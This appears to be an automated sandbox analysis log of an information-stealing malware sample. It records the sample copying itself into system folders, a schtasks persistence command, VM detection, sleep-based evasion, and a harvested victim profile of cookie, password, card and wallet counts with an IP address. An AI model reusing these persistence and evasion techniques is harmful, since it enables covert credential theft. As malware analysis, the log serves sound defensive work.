                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596266s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596028s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595813s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595672s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595522s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595019s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594640s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594285s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594171s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593954s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593844s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593732s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593583s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593349s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592866s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592698s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592506s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592166s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591905s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591779s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591664s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591562s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591453s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591269s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591156s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591046s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590937s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590823s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590718s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590597s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590459s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590343s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590209s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590093s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -589984s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -589841s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7296Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 7300Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 7312Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe TID: 7404Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 8168Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 3228Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 5496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 3868Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 5252Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe TID: 2656Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe TID: 4208Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 1852Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 3600000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597406Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596953Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596836Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596532Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596028Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595672Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595522Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595019Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594285Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594171Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593954Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593732Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593583Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593349Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592866Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592698Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592506Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592166Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591905Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591779Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591664Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591562Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591453Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591269Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591156Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591046Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590937Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590823Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590718Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590597Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590459Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590343Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590209Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590093Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 589984Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 589841Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1735897086.000000001B025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\LC
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1750078986.000000001BE03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\|
                    Source: services.exe, 00000010.00000002.3020526244.000000001CE1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
                    Source: w32tm.exe, 00000017.00000002.1771137058.0000024516C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B9414D0 rdtsc 16_2_00007FFD9B9414D0
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess token adjusted: Debug
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess token adjusted: Debug
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess token adjusted: Debug
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /fJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: services.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"0","Files Groups (8c96)":"N","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"0","History Count (1671)":"15","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"?"},"5.0.4",1,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\GameBarPresenceWriter","8HSE8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]5e425b57
                    Source: services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"0","Files Groups (8c96)":"N","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"0","History Count (1671)":"15","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"?"},"5.0.4",1,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\GameBarPresenceWriter","8HSE8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                    Source: services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"0","Files Groups (8c96)":"N","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"0","History Count (1671)":"15","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"?"},"5.0.4",1,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\GameBarPresenceWriter","8HSE8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York
                    Source: services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                    Source: services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeQueries volume information: C:\Users\user\Desktop\Z4D3XAZ2jB.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
